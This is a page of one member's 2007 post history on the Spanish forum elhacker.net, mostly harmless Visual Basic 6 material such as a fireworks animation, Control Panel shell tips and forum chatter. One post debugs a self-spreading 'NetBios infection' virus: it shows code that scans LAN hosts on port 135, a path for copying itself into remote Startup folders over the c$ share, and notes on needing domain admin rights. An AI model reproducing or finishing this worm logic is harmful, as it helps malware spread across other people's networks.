elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Mensajes
Páginas: 1 ... 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 [75] 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 ... 102
741  Programación / Programación Visual Basic / Re: [Source] NetBios infection Module (ojo que es peligroso!) en: 18 Julio 2007, 23:27 pm
yo probe esto en una computadora conectada a otra en red lan, le probe con varias funciones de downloader haber si funka y nada no funka no se movio ni un pelito la otra pc, siempre chekeaba y nada q aparece el uptader.exe en ningun lado supongo q aparece en una carpeta de esas raras con %..., no funciono nada, a lo mejor era el firewall q se reia de mi :xD, q va.. no era el firewall xq lo desactive tambien hasta el antivirus y no funka, y eso de tener activado compartir impresoras ps si esta xq sencillamente mandas a imprimir algo desde esa pc y lo imprime en la pc (la otra) sera q sta mal el codigo¿ o ya hay parche¿ intentare de nuevo..

Uaaaa, ya sé porqué no te funciona. (Ha sido un fallo mio).

Código
  1. For i = 1 To 254                                            'Bucle desde X.X.X.1 hasta X.X.X.254
  2.        If WS.State <> sckClosed Then WS.CloseSck               'Si el Socket no está cerrado, lo cerramos para evitar errores.
  3.        DoEvents                                                'Esperamos...
  4.            WS.Connect SubNet & "." & i, 135                    'Nos conectamos a todos los Hosts de la LAN al puerto 135 TCP (NetBios)
  5.        [b]Sleep 500[/b]                                               'Esperamos 1/2 Segundo...
  6.        If WS.State = sckConnected And i <> MyHost Then         'Si el Hosts es vulnerable y el Host no es MiPC entonces...
  7.            AliveHosts = AliveHosts & i & ","                   '   añadimos el octeto del Host en el Array
  8.        End If                                                  'End If
  9.    Next i

Es por culpa del Sleep, esa función "duerme" todas las acciones del VB, incluido el IF que hay debajo, por eso en algunos equipos el scanning no funcionara del todo bien. Luego mejoro eso.

Otro error...

Código
  1. tmpIP = "\\" & SubNet & "." & tmpArray(i) & "\c$\Documents and Settings\All Users\Menú Inicio\Programas\Inicio"

Se copia en el perfil All Users, ese perfil está como solo lectura para todos los usuarios y escritura para los Administradores. Si el equipo desde donde lanzas el virus no es administrador de los otros equipos no logrará copiarse. En mi caso utilizo un dominio y lo lancé bajo los credenciales de Administrador del Dominio, por eso a mi me ha funcionado y a ti no. Lo he probado en un grupo de trabajo normal y no funciona xD

Este fin de semana me pongo y lo arreglo, ok? Lo siento y saludos!!
742  Programación / Programación Visual Basic / Re: [Source] Fireworks++ - Lanza petardos y cohetes en VB6 (MEJORADO!!) en: 18 Julio 2007, 16:38 pm
Ok, pero al postear esto hay k poner la fuente y el autor.

Bueno, lo que me faltaba por oir...

1) El source, como bien he dicho en el primer mensaje NO ES MIO, y creo que eso ya ha quedado bastante claro.
2) No puedo citar la fuente original porque ese source me lo pasó un usuario que tengo en el Messenger, ese usuario leyó el primer source de fireworks y me pasó ese, SIN COMENTARIOS, SIN AUTOR Y SIN LA FUENTE!

En resumedas cuentas, me han pasado ese source por MSN, no me dijeron de donde lo sacaron ni nada, y los comentarios del source ya estaban quitados! En ningún momento he dicho que lo haya programado yo, simplemente recibí ese source y lo modifiqué para hacer unos efectos nuevos.



Pero vamos... no quiero discutir más contigo, con mensajes como este demuestras tu rabia y odio hacia mi persona (¿envidi quizás?, no se). Paso de tí y voy a dejar esta disputa como otra más de las que ya he tenido contigo...
743  Programación / Programación Visual Basic / [Source] Fireworks++ - Lanza petardos y cohetes en VB6 (MEJORADO!!) en: 16 Julio 2007, 23:33 pm
Bueno, aquí el remate final. El Source no es mío, la librería usada para el efecto de "niebla" es sencillamente BRUTAL!

1) Mejorado los efectos de niebla
2) Se han añadido nuevas fórmulas matemáticas para simular petardos
3) Funciona con MouseClick o Random
4) Es wapisimo!! xD





Adjunto source y versón compilada.

NO EJECUTAR ESTE SOURCE DIRECTAMENTE DESDE EL VB6, TENÉIS QUE COMPILARLOS (CREAR EL EXE) Y EJECUTARLO DESDE AHÍ. SI LO EJECUTAS DESDE EL VB6 NO FUNCIONA BIEN!



Recomiendo, cuando lo ejecutéis, que pulséis sobre la opción NO y luego hagáis click con el raton encima del cuadro. Saludos!!
744  Programación / Programación Visual Basic / Re: [ Nuevo aporte ] en: 16 Julio 2007, 00:31 am
Para abrir el Panel de Control de un equipo a mi me gusta usar:

Código
  1. Shell "control"

Con esto te permite abrir los elementos internos, por ejemplo:

Código
  1. Shell "control userpasswords"
745  Programación / Programación Visual Basic / Re: [ Nuevo aporte ] en: 16 Julio 2007, 00:16 am
a si esta bien  buen aporte  :P

por cierto ||MadAntrax||

te bajaron de rango?

ahora solo dice Moderador y no Moderador Global

Nombre:     ||MadAntrax||
Título Personalizado:    Lab Member
Mensajes:    1.130 (1,020 por día)
Grupo:    CoAdmin

Aparece Moderador porque soy miembro del grupo de Moderadores de este foro. Pero en realidad soy CoAdmin
746  Programación / Programación Visual Basic / Re: Problema con iconchanger en: 15 Julio 2007, 22:56 pm
iconchanger falla si...

1) el ejecutable está comprimido o empaquetado (UPX por ejemplo)
2) intentas extraer un icono que no está, está currupto...
3) el ejecutable solo tiene iconos de 16.16, falta el 32x32

revisa esos puntos
747  Programación / Programación Visual Basic / Re: GetProcessesByName en Visual 6???!!! PLX HELP :S:S:S:S en: 15 Julio 2007, 21:56 pm
Aquí tienes un ejemplo que CREO que te funcionará

http://foro.elhacker.net/index.php/topic,159820.0.html

El programa dumpea procesos, en la primera parte del código verás como se obtienen todos los procesos que se están ejecutando. Solo necesitas agregar un FOR para recorrer el listado y buscar el proceso que tu desees.

Saludos!!
748  Programación / Programación Visual Basic / [Source] Fireworks - Lanza petardos y cohetes en VB6 en: 15 Julio 2007, 18:30 pm
Precioso efecto para añadir en nuestro "About Dialog Box" de cualquier aplicación. Lanza petardos y cohetes de forma aleatória y con colores. Utiliza AlphaBending para simular efecto de "petardo"



Ojo, el source no es mio, lo encontré en www.pscode.com como un screensaver, he tenido que modificar bastante el código para dejarlo limpio y listo para usarlo. Sencillamente precioso, no utiliza librerías de DX7 ni DLL''s ni OCX''s

Código
  1. Private Type Particle
  2.    X As Single
  3.    Y As Single
  4.    Xv As Single
  5.    Yv As Single
  6.    Life As Integer
  7.    Dead As Boolean
  8.    Color As Long
  9. End Type
  10.  
  11. Private Type FireWork
  12.    X As Single
  13.    Y As Single
  14.    Height As Integer
  15.    Color As Long
  16.    Exploded As Boolean
  17.    P() As Particle
  18. End Type
  19.  
  20. Private Type BLENDFUNCTION
  21.  BlendOp As Byte
  22.  BlendFlags As Byte
  23.  SourceConstantAlpha As Byte
  24.  AlphaFormat As Byte
  25. End Type
  26.  
  27. Private Declare Function AlphaBlend Lib "msimg32.dll" (ByVal hDC As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal hDC As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal BLENDFUNCT As Long) As Long
  28. Private Declare Sub RtlMoveMemory Lib "kernel32.dll" (Destination As Any, Source As Any, ByVal Length As Long)
  29. Private Declare Function SetPixelV Lib "gdi32" (ByVal hDC As Long, ByVal X As Long, ByVal Y As Long, ByVal crColor As Long) As Long
  30.  
  31. Dim BF As BLENDFUNCTION
  32. Dim lBF As Long
  33.  
  34. Dim FW() As FireWork
  35. Dim FWCount As Integer
  36. Dim RocketSpeed As Integer
  37.  
  38. Private Sub StartFireWork()
  39.    For i = 0 To FWCount
  40.        If FW(i).Y = -1 Then
  41.            GoTo MAKEFIREWORK
  42.        End If
  43.    Next i
  44.  
  45.    FWCount = FWCount + 1
  46.  
  47.    ReDim Preserve FW(FWCount)
  48.    i = FWCount
  49.  
  50. MAKEFIREWORK:
  51.  
  52.    FW(i).X = Int(Rnd * Me.ScaleWidth)
  53.    FW(i).Y = Me.ScaleHeight
  54.    FW(i).Height = Rnd * Me.ScaleHeight
  55.    FW(i).Color = Int(Rnd * vbWhite)
  56.    FW(i).Exploded = False
  57.    ReDim FW(i).P(10)
  58. End Sub
  59.  
  60. Private Sub DrawFireWork(tFW As FireWork)
  61.    Dim DeadCount As Integer
  62.    Dim RndSpeed As Single
  63.    Dim RndDeg As Single
  64.  
  65.    With tFW
  66.        If .Exploded Then
  67.            For i = 0 To UBound(.P)
  68.                If .P(i).Life > 0 Then
  69.                    .P(i).Life = .P(i).Life - 1
  70.                    .P(i).X = .P(i).X + .P(i).Xv
  71.                    .P(i).Y = .P(i).Y + .P(i).Yv
  72.                    .P(i).Xv = .P(i).Xv / 1.05
  73.                    .P(i).Yv = .P(i).Yv / 1.05 + 0.05
  74.                    PSet (.P(i).X, .P(i).Y), .P(i).Color
  75.                ElseIf .P(i).Life > -40 Then
  76.                    .P(i).Life = .P(i).Life - 1
  77.                    .P(i).X = .P(i).X + .P(i).Xv + (0.5 - Rnd)
  78.                    .P(i).Y = .P(i).Y + .P(i).Yv + 0.1
  79.                    .P(i).Xv = .P(i).Xv / 1.05
  80.                    .P(i).Yv = .P(i).Yv
  81.                    SetPixelV Me.hDC, .P(i).X, .P(i).Y, .P(i).Color
  82.                Else
  83.                    .P(i).Dead = True
  84.                    DeadCount = DeadCount + 1
  85.                End If
  86.            Next i
  87.  
  88.            If DeadCount >= UBound(.P) Then
  89.                .Y = -1
  90.            End If
  91.        Else
  92.            .Y = .Y - RocketSpeed
  93.            If .Y < .Height Then
  94.                Dim ExplosionShape As Integer
  95.  
  96.                ExplosionShape = Int(Rnd * 6)
  97.  
  98.                Select Case ExplosionShape
  99.                    Case 0 ''Regular
  100.                        ReDim .P(Int(Rnd * 100) + 100)
  101.  
  102.                        For i = 0 To UBound(.P)
  103.                            .P(i).X = .X
  104.                            .P(i).Y = .Y
  105.                            .P(i).Life = Int(Rnd * 20) + 20
  106.  
  107.                            RndSpeed = (Rnd * 5)
  108.                            RndDeg = (Rnd * 360) / 57.3
  109.  
  110.                            .P(i).Xv = RndSpeed * Cos(RndDeg)
  111.                            .P(i).Yv = RndSpeed * Sin(RndDeg)
  112.                            .P(i).Color = .Color
  113.                        Next i
  114.  
  115.                        .Exploded = True
  116.                    Case 1 ''Smilely
  117.                        ReDim .P(35)
  118.                        ReDim .P(50)
  119.                        ReDim .P(52)
  120.  
  121.                        For i = 0 To 35
  122.                            .P(i).X = .X
  123.                            .P(i).Y = .Y
  124.                            .P(i).Life = 50
  125.  
  126.                            .P(i).Xv = 3 * Cos(((360 / 35) * (i + 1)) / 57.3)
  127.                            .P(i).Yv = 3 * Sin(((360 / 35) * (i + 1)) / 57.3)
  128.                            .P(i).Color = .Color
  129.                        Next i
  130.  
  131.                        For i = 36 To 50
  132.                            .P(i).X = .X
  133.                            .P(i).Y = .Y
  134.                            .P(i).Life = 50
  135.  
  136.                            .P(i).Xv = 2 * Cos(((360 / 35) * i + 15) / 57.3)
  137.                            .P(i).Yv = 2 * Sin(((360 / 35) * i + 15) / 57.3)
  138.                            .P(i).Color = .Color
  139.                        Next i
  140.  
  141.                        With .P(51)
  142.                            .X = tFW.X
  143.                            .Y = tFW.Y
  144.                            .Life = 50
  145.                            .Xv = 2 * Cos(-55 / 57.3)
  146.                            .Yv = 2 * Sin(-55 / 57.3)
  147.                            .Color = tFW.Color
  148.                        End With
  149.  
  150.                        With .P(52)
  151.                            .X = tFW.X
  152.                            .Y = tFW.Y
  153.                            .Life = 50
  154.                            .Xv = 2 * Cos(-125 / 57.3)
  155.                            .Yv = 2 * Sin(-125 / 57.3)
  156.                            .Color = tFW.Color
  157.                        End With
  158.  
  159.                        .Exploded = True
  160.                    Case 2 ''Star
  161.                        ReDim .P(50)
  162.  
  163.                        RndDeg = Int(360 * Rnd)
  164.  
  165.                        For i = 0 To UBound(.P)
  166.                            .P(i).X = .X
  167.                            .P(i).Y = .Y
  168.                            .P(i).Life = 50
  169.  
  170.                            .P(i).Xv = (i * 0.1) * Cos(((360 / 5) * (i + 1) + RndDeg) / 57.3)
  171.                            .P(i).Yv = (i * 0.1) * Sin(((360 / 5) * (i + 1) + RndDeg) / 57.3)
  172.                            .P(i).Color = .Color
  173.                        Next i
  174.  
  175.                        .Exploded = True
  176.                    Case 3 ''Spiral
  177.                        ReDim .P(50)
  178.  
  179.                        RndDeg = (360 * Rnd)
  180.  
  181.                        For i = 0 To UBound(.P)
  182.                            .P(i).X = .X
  183.                            .P(i).Y = .Y
  184.                            .P(i).Life = 50
  185.  
  186.                            .P(i).Xv = (i * 0.1) * Cos(((360 / 25) * (i + 1) + RndDeg) / 57.3)
  187.                            .P(i).Yv = (i * 0.1) * Sin(((360 / 25) * (i + 1) + RndDeg) / 57.3)
  188.                            .P(i).Color = .Color
  189.                        Next i
  190.  
  191.                        .Exploded = True
  192.                    Case 4 ''Regular Random
  193.  
  194.                        ReDim .P(Int(Rnd * 100) + 100)
  195.  
  196.                        For i = 0 To UBound(.P)
  197.                            .P(i).X = .X
  198.                            .P(i).Y = .Y
  199.                            .P(i).Life = Int(Rnd * 20) + 20
  200.  
  201.                            RndSpeed = (Rnd * 5)
  202.                            RndDeg = (Rnd * 360) / 57.3
  203.  
  204.                            .P(i).Xv = RndSpeed * Cos(RndDeg)
  205.                            .P(i).Yv = RndSpeed * Sin(RndDeg)
  206.                            .P(i).Color = Int(Rnd * vbWhite)
  207.                        Next i
  208.  
  209.                        .Exploded = True
  210.                End Select
  211.            Else
  212.                SetPixelV Me.hDC, .X, .Y, vbWhite
  213.            End If
  214.        End If
  215.    End With
  216. End Sub
  217.  
  218. Private Sub Form_KeyPress(KeyAscii As Integer)
  219.    End
  220. End Sub
  221.  
  222. Private Sub Form_Load()
  223.    Randomize
  224.  
  225.    RocketSpeed = Int(Rnd * 4) + 2
  226.    FWCount = -1
  227.  
  228.    BF.BlendOp = &H0
  229.    BF.BlendFlags = 0
  230.    BF.AlphaFormat = 0
  231. End Sub
  232.  
  233. Private Sub Timer1_Timer()
  234.    For i = 0 To FWCount
  235.        DrawFireWork FW(i)
  236.    Next i
  237.  
  238.    RtlMoveMemory lBF, BF, 4
  239.    AlphaBlend Me.hDC, 0, 0, Me.ScaleWidth, Me.ScaleHeight, Picture1.hDC, 0, 0, Picture1.ScaleWidth, Picture1.ScaleHeight, lBF
  240.    Me.Refresh
  241. End Sub
  242.  
  243. Private Sub Timer2_Timer()
  244.    StartFireWork
  245.    BF.SourceConstantAlpha = Int(Rnd * 25)
  246.    Timer2.Interval = Int(Rnd * 500)
  247.    Label1.ForeColor = FW(i).Color
  248. End Sub
  249.  
  250.  

Download only for registered users!
749  Media / Juegos y Consolas / Re: ¿que PSP me compro? en: 15 Julio 2007, 17:18 pm
Si no quieres cagarla antes de comprarte una PSP hay un truco para averiguar que versión de firmware te encontrarás SIN ABRIR LA CAJA, solo mirando el código de barras.



Yo cuando me la compré era una H (2.50) y me fue de maravilla.

Saludos!!
750  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Las comillas simples se duplican solas al publicar un post en: 15 Julio 2007, 13:05 pm
Si, yo al menos me he fijado, también ocurre que si escribimos el caracter "\" desaparece.

Para hacer que aparezca hay que escribirlo 2 veces seguidas, curioso, no?
Páginas: 1 ... 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 [75] 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 ... 102
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines